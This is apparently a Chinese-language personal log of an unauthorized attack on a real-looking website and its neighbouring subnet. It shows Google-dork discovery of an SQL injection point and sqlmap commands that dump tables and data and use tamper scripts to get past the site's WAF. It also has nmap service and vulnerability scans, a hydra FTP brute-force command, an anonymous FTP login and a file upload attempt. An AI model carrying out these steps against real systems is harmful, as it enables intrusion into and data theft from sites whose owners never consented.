用google语法，找到一个注入点。用ｓｑｌｍａｐ检测一下。

sqlmap显示，在access数据库中，列举数据库名称是不可能的，让我们直接列举表名。

真的等了有蛮久。。是穷举吗，最后得出了数据库名称，和表名。

\

:::
:::

接下来列名。

\

:::
:::

以及列名中的数据。

\

:::
:::

\

:::
:::

没找到后台。

2017.10.22 更新

进行信息收集。在网页后方加 /foot.asp   了解该网页制作时间是七八年前。

/uploadfile   403禁止访问，看来基本的安全措施是做了的

Directory Listing Denied

This Virtual Directory does not allow contents to be listed.

操作系统：Microsoft Windows 2003|XP (92%)

开放端口：21（ftp）、80（http）

开放具体服务版本：

nmap　域名　-sV -p 21,80

21/tcp open  ftp    Microsoft ftpd

80/tcp open  http    Microsoft IIS httpd 6.0

nmap --script=vuln www.域名马赛克.org

http-csrf:

| Spidering limited to: maxdepth=3; maxpagecount=20;
withinhost=域名马赛克

|  Found the following possible CSRF vulnerabilities:

|    Path: http://www.域名马赛克/ly.asp

|    Form id:

|_    Form action: messageok.asp?actopt=add

|_http-dombased-xss: Couldn't find any DOM based XSS.

whatweb -v　域名

没有探测到什么特别的信息，结果基本符合上面探测的内容。

sqlmap -u "http://www.xxx.org/yyjshow.asp?id=1429&ctype=ÒôÀÖ¼¾\“
--dbms "Microsoft Access" --level 3

再次注入，发现该网站加了一个ｗａｆ。。。虽然可以用ｓｑｌｍａｐ绕过，但是请求过多就会拒绝连接。于是。。。

sqlmap -u "http://www.xxxxx.org/yyjshow.asp?id=1429&ctype=ÒôÀÖ¼¾\“
--dbms "Microsoft Access" --level 3 --tamper charunicodeencode.py
space2comment.py --tables

[22:14:40] [ERROR] cannot retrieve table names, back-end DBMS
is Access

do you want to use common table existence check? [Y/n/q] y

这种枚举方式有３０００多个表，而且连接经常断掉，所以暂时放弃。

获得一个存在的表　user

ftp爆破：hydra ip ftp -L 用户名.txt -P 密码.txt -t 线程(默认16) -vV

检查Ｃ段

nmap -sV 61.155.154.* -oX myscan.xml

全部是在线的，而且都是ｗｉｎｄｏｗｓ，开端口21、80.

ftp匿名登录扫描，扫到了２个。。真是好运气

xx.xx.xx.xx:     21 - Anonymous READ (220-Microsoft FTP Service 220)

ftp  xxx.xxx.xx.xx

anonymous

ls

put /root/Desktop/xx.py

两个ｆｔｐ服务器上，没发现任何文件，而且没有写权限。

啊啊～溢出溢出不会。

待续
:::
:::
:::